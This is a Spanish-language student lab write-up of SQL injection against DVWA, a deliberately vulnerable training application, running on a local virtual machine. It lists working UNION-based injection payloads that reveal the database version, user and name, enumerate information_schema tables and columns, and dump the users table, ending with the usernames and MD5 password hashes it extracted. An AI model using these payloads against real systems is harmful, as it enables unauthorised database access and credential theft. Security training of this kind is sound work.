TAREA 2: SQL injection
Una vez descargada la maquina virtual e importada a virtualBox procedemos a ingresar mediante la ip dada por dhcp.Entramos mediante el navegador web accede a la dirección http://192.168.56.101/login.php
A continuación mediante el usuario admin y la clave password acedemos a la web que se muestra.
Una ves ingresado lo siguiente es cambiar el nivel de seguridad a baja.
Seleccionamos la opción de SQL Inyeccon y procedemos a hacer las respectivas practicas:
Enviamos como user id "1" con lo cual nos devolvera el ID, nombre, apellido del respectivo usuario en este caso el el "1".
El siguiente paso es mostrar todos los registros que son falsos y verdaderos, con el siguiente comando %' or '0'='0
Lo siguiente es la visualización de la versión de la base de datos y lo realizamos con el siguiente comando: %' or 0=0 union select null, version() #
Como podemos notar en la parte inferior nos indica la version de la base de datos: 5.5.44-0+deb8u1
El siguiente paso es obtener el usuario de la base de datos y lo realizamos con el siguiente comando: %' or 0=0 union select null, user() #
Nos muestra en la parte inferior el el apellido: dvwa@localhost
Lo siguiente es conocer el nombre de la base de datos lo cual se lo realiza con el siguiente comando: %' or 0=0 union select null, database() #
El nombre de la base de datos es: dvwa
Lo siguiente es todas las tablas de INFORMATION_SCHEMA lo cual se lo realiza con el siguiente comando: %' and 1=0 union select null, table_name from information_schema.tables #
Mostrar todas las columnas de campo contenidos en la tabla de usuario INFORMATION_SCHEMA con el siguiente comando : %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Por ultimo leemos la tabla password para obtener las claves y usuarios.
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
Y asi optenemos los datos de los usuarios de la base de datos:
admin :5f4dcc3b5aa765d61d8327deb882cf99
gordonb :e99a18c428cb38d5f260853678922e03
1337 :8d3533d75ae2c3966d7e0d4fcc69216b
pablo :0d107d09f5bbe40cade3de5c71e9e9b7
smithy :5f4dcc3b5aa765d61d8327deb882cf99